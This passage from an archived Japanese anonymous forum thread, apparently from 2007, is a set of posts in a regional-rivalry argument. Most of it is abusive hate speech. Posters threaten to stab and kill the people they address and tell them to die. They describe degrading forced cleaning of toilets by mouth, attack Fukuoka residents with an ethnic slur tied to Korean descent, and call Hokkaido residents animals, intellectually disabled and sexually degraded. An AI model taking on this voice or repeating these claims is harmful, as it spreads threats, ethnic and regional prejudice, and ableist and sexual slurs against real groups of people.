1億円払えクソがぁ。払えなかったら俺ン家で床掃除でもしてろ。ただし全部口で掃除しろ罪人の子孫。便器もなぁ。
汚いとかヌカすと刺すぞコラ。テメェのツラの方が数兆倍汚いんだよハゲ!鏡見ろボケ。鏡が腐りそうだぜ。
嫌なら死んだっていいぜ。その方が地球にとってありがたい。消滅しろ。バニシュ・デスや。二度とそのツラ見せるな。
もし生まれ変わっても首都圏人見たら真っ先に公衆トイレにでも鍵掛けてガクガクしながら隠れとけボケが


95 :名無しの歩き方@お腹いっぱい。:2007/04/06(金) 21:57:10 ID:JRqVg/Dk0
どうして福岡はバカにされるのか?福岡が無くなったところで、誰も困らないからだ。
●札幌が無くなったらうまい飲食物がなくなる。色白二重瞼人口が激減する。観光客が減る。
●仙台が無くなったらアメリカ産牛タンが食えなくなる。他にも萩の月、笹かま。
●東京が無くなったらプレステできなくなるし、ホンダに乗れなくなる。
●名古屋が無くなったらノリタケチャイナ買えなくなるし、トヨタに乗れなくなる。
●京都が無くなったらゲームボーイができなくなるし、ピカチュウともお別れだ。
●大阪が無くなったらサントリーが飲めなくなるし、パナソニック製品が買えなくなる。
●神戸が無くなったら美味しい日本酒が飲めなくなるし、KAWASAKIのバイクに乗れなくなる。
●広島が無くなったらマツダが乗れなくなる。
●福岡が無くなっても、なにも困らない。日本が失うものは朝鮮系一重瞼色黒チビ人口が大幅に減る。

福岡は日本の経済成長に全く貢献してこなかったし、これからもそうだろう。はっきりいって福岡はいらない。

これが福岡の真実だ。
福岡に関する捏造・偏向報道を受け続けていた福岡人には、信じられないだろう。

しかし、これが真実なのだ。

96 :名無しの歩き方@お腹いっぱい。:2007/04/06(金) 21:59:56 ID:RKZzOV5T0
おい!こら!どーみん!

9割以上の道民は劣っているんだ。これは絶対だ!
ほんと、道民同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
道民はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。どーみん。

道民は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にも本籍地北海道だよ?吐き気がするね。
北海道人で海外留学? ちょっと殺すよ?
まともな語学力もない道民が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な道民集団で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。道民は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
道民という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い道民は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が道民だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?どーみん


97 :名無しの歩き方@お腹いっぱい。:2007/04/06(金) 22:45:23 ID:1n8v0w7A0
都市高のってみたいよ〜

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)